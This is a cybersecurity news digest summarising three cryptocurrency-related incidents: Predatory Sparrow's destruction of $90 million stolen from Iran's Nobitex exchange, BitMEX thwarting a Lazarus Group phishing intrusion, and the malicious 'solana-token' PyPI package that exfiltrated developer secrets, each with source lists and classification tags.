FlagThis - #cryptocurrency

A pro-Israel hacking group, known as Predatory Sparrow, has claimed responsibility for a cyberattack against Nobitex, Iran’s largest cryptocurrency exchange. The attack resulted in the theft of approximately $90 million in various cryptocurrencies, including Bitcoin and Dogecoin, as well as over 100 other cryptocurrencies. According to blockchain analytics firm Elliptic, the funds were drained from the exchange’s wallets into blockchain addresses containing anti-government messages explicitly referencing Iran's Islamic Revolutionary Guard Corps (IRGC).

The attackers, instead of attempting to profit financially, intentionally destroyed the stolen cryptocurrency in what has been described as a symbolic political statement. The funds were sent to blockchain addresses with the phrase "F***iRGCTerrorists" embedded within them. Experts say that generating addresses with such specific terms requires significant computing power, suggesting the primary goal was to send a message rather than to gain financially. The incident underscores the rising geopolitical tensions between Israel and Iran and the vulnerability of cryptocurrency exchanges to politically motivated cyberattacks.

The cyberattack on Nobitex is part of a broader pattern of cyber warfare between Israel and Iran. While the physical conflict has seen airstrikes and other military actions, the digital realm has become another battleground, with potentially significant repercussions for both countries and the wider global community. This incident also follows reports of internet restrictions within Iran, limiting citizens' access to information and communication amidst escalating tensions. The global cybersecurity community needs to stay prepared for security repercussions for the two combatants and the wider global community as the cyberwarfare portion of the conflict is already spilling over off the battlefield and outside the region.


References :

• Zack Whittaker: This article also discusses the attack against Nobitex, noting the financial losses and the involvement of a pro-Israel hacking group.
• techcrunch.com: This news source provides information about the attack against Nobitex, mentioning the theft and destruction of cryptocurrency.
• Metacurity: This article reports on the attack against Nobitex by the Predatory Sparrow group, highlighting the financial impact and geopolitical context of the event.
• NFTgators: This news piece details the financial impact of the attack on Nobitex and the potential geopolitical implications.
• WIRED: This article covers the same event with additional details about the actions of the attacker group and their motives.
• aboutdfir.com: Pro-Israel hackers drained $90 million from Iran crypto exchange, analytics firm says
• fortune.com: Pro-Israel group hacks Iranian crypto exchange for $90 million—but throws away the money
• SecureWorld News: As kinetic conflict continues to unfold between Israel and Iran, a parallel battle is raging in cyberspace—one that is disrupting financial systems, wiping out crypto holdings, hijacking broadcast channels, and even triggering a near-total internet shutdown.
• Web3 is Going Just Great: Israeli-linked hackers steal and destroy $90 million from Iranian Nobitex exchange The Iran-based Nobitex cryptocurrency exchange suffered a $90 million hack, and the attacker has also promised to imminently release data and source code from the platform.
• www.elliptic.co: The Iran-based Nobitex cryptocurrency exchange suffered a $90 million hack, and the attacker has also promised to imminently release data and source code from the platform.

Classification:

• HashTags: #CyberWarfare #Crypto #IranIsrael
• Company: Iran Crypto Exchange
• Target: Iran Crypto Exchange
• Attacker: Predatory Sparrow
• Product: Crypto Exchange
• Type: Hack
• Severity: Disaster

The BitMEX cryptocurrency exchange has successfully thwarted an intrusion attempt orchestrated by the Lazarus Group, a notorious hacking organization with ties to North Korea. The exchange's security team detected the attack, preventing any compromise of their systems. In a significant countermove, BitMEX's security team managed to access one of the Lazarus Group's servers, providing valuable insights into their operations and tactics.

Researchers at BitMEX uncovered critical missteps made by the Lazarus Group during their campaigns, including exposed IP addresses and an accessible database. One key finding involved a rare slip-up where a hacker inadvertently revealed their real IP address, which was traced to Jiaxing, China. This location is near Shanghai and represents a notable lapse in security for the typically secretive group. BitMEX also blocked a phishing attempt linked to the Lazarus Group, where attackers posed as NFT partners on LinkedIn to trick one of its employees.

The Lazarus Group's attack strategy often begins with relatively unsophisticated methods like phishing to gain initial access to targeted systems. In this case, the attackers invited a BitMEX employee to a private GitHub repository containing code for a fake Next.js/React website. The goal was to make the victim run the project, which included malicious code, on their computer. BitMEX emphasized that the "Lazarus Group" comprises multiple hacking teams under the control of the North Korean government, responsible for stealing significant sums of money through various cyberattacks.


References :

• blog.bitmex.com: The BitMEX cryptocurrency exchange says it detected and stopped an intrusion attempt from North Korean hacking group Lazarus. BitMEX's security team gained access to one of the group's servers and traced one of its operators to Jiaxing, China.
• bsky.app: The BitMEX cryptocurrency exchange says it detected and stopped an intrusion attempt from North Korean hacking group Lazarus.
• DataBreaches.Net: Researchers at crypto exchange BitMEX on Friday said that they had uncovered several critical missteps that North Korean state-sponsored hacker group Lazarus had made during its campaigns. Those lapses included exposed IP addresses, an accessible Supabase database, and tracking algorithms.
• Catalin Cimpanu: BitMEX cryptocurrency exchange says it detected and stopped an intrusion attempt from North Korean hacking group Lazarus. BitMEX's security team gained access to one of the group's servers and traced one of its operators to Jiaxing, China.
• www.bitdegree.org: BitMEX has blocked a phishing attempt linked to the Lazarus Group , a hacking operation with ties to North Korea.
• Metacurity: German police ID Trickbot's "Stern," BitMEX thwarts Lazarus Group attack, Shin Bet thwarted 85 Iranian cyberattacks aimed at civilians, Vibe coding app Lovable failed to fix critical flaw, China's quantum satellite Micius has a security flaw, Russia's Unit 29155 has a hacker team, much more
• bsky.app: The BitMEX cryptocurrency exchange thwarted an intrusion attempt from the North Korean hacking group Lazarus Group.
• securityonline.info: BitMEX Turns Tables on Lazarus Group: Infiltrates Hacker Infrastructure
• securityonline.info: BitMEX Turns Tables on Lazarus Group: Infiltrates Hacker Infrastructure
• Metacurity: Bitcoin options trading venue BitMEX discovered an operational security mistake in a thwarted attack by N. Korea's Lazarus Group, which revealed the attackers' IP address and uncovered at least 10 potential accounts used to test or develop its malware.

Classification:

• HashTags: #LazarusGroup #BitMEX #Cybersecurity
• Company: BitMEX
• Target: BitMEX
• Attacker: Lazarus Group
• Product: Cryptocurrency
• Feature: intrusion attempt
• Type: Hack
• Severity: Medium

A malicious Python package named `solana-token` has been discovered on the Python Package Index (PyPI) targeting Solana developers. This rogue package, posing as a utility for the Solana blockchain, was designed to exfiltrate source code and developer secrets from compromised machines to a hard-coded IP address. The ReversingLabs research team uncovered this supply chain attack, highlighting the increasing trend of malicious actors targeting cryptocurrency projects. Before being taken down, the `solana-token` package was downloaded over 600 times, potentially distributed through developer-focused platforms.

The malicious package contained telltale signs of compromise, including hardcoded IP addresses, outbound communications to non-standard network ports, and code that reads local files, typical of information stealers. One insidious method employed by the package scanned the Python execution stack, copied, and exfiltrated source code contained in all the files in the execution chain to a remote server. The objective was to steal sensitive information such as developer secrets and hardcoded crypto credentials, which could grant attackers unauthorized access to cryptocurrency wallets and critical infrastructure.

This incident is not isolated, a previous package with the same name was published and removed in 2024, suggesting that the same malicious actors may be behind the new malicious version, said the report. Cybersecurity experts recommend that organizations respond to address the increasing number of supply chain threats targeting cryptocurrency projects by aggressively monitoring for suspicious activity and unexplained changes within open source and commercial, third-party software modules. By stopping malicious code before it is allowed to penetrate secure development environments, teams can prevent destructive supply chain attacks.


References :

• securityonline.info: PyPI Malware Alert: Malicious ‘solana-token’ Package Targets Solana Developers
• Blog (Main): Same name, different hack: PyPI package targets Solana developers
• securityonline.info: PyPI Malware Alert: Malicious ‘solana-token’ Package Targets Solana Developers
• The Hacker News: Malicious PyPI Package Posing as Solana Tool Stole Source Code

Classification:

• HashTags: #SupplyChainAttack #Cryptocurrency #Solana
• Company: ReversingLabs
• Target: Solana Developers
• Product: solana-token
• Feature: data exfiltration
• Malware: solana-token
• Type: Malware
• Severity: Medium